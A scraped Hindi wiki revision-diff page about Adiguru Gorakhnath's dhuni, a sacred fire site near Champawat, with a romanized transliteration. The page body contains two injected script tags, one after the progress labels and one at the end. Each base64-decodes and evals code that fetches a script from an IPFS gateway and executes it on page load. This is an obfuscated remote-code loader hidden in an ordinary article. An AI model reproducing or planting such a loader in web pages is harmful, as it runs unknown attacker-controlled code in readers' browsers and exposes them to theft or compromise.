Difference between revisions of "आदिगुरु गोरखनाथ की धूनी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
'''आदिगुरु गोरखनाथ की धूनी''' [[चम्पावत]] से लगभग 33 कि.मी. की दूरी पर स्थित है। चनामक स्थान से इस स्थल हेतु लगभग 1.5 कि.मी. की दूरी पैदल तय करने के उपरांत इस स्थान पर पहुंचा जा सकता है। जनश्रुति है कि यह धूनी [[सतयुग]] से लगातार प्रज्जवलित है। यह स्थल नैसर्गिक सौंदर्यता से परिपूर्ण है।
+
'''आदिगुरु गोरखनाथ की धूनी''' [[चम्पावत]] से लगभग 33 कि.मी. की दूरी पर स्थित है। चनामक स्थान से इस स्थल हेतु लगभग 1.5 कि.मी. की दूरी पैदल तय करने के उपरांत इस स्थान पर पहुंचा जा सकता है। जनश्रुति है कि यह धूनी [[सतयुग]] से लगातार प्रज्वलित है। यह स्थल नैसर्गिक सौंदर्यता से परिपूर्ण है।
  
  

Latest revision as of 12:36, 25 September 2012

adiguru gorakhanath ki dhooni champavat se lagabhag 33 ki.mi. ki doori par sthit hai. chanamak sthan se is sthal hetu lagabhag 1.5 ki.mi. ki doori paidal tay karane ke uparaant is sthan par pahuancha ja sakata hai. janashruti hai ki yah dhooni satayug se lagatar prajvalit hai. yah sthal naisargik sauandaryata se paripoorn hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>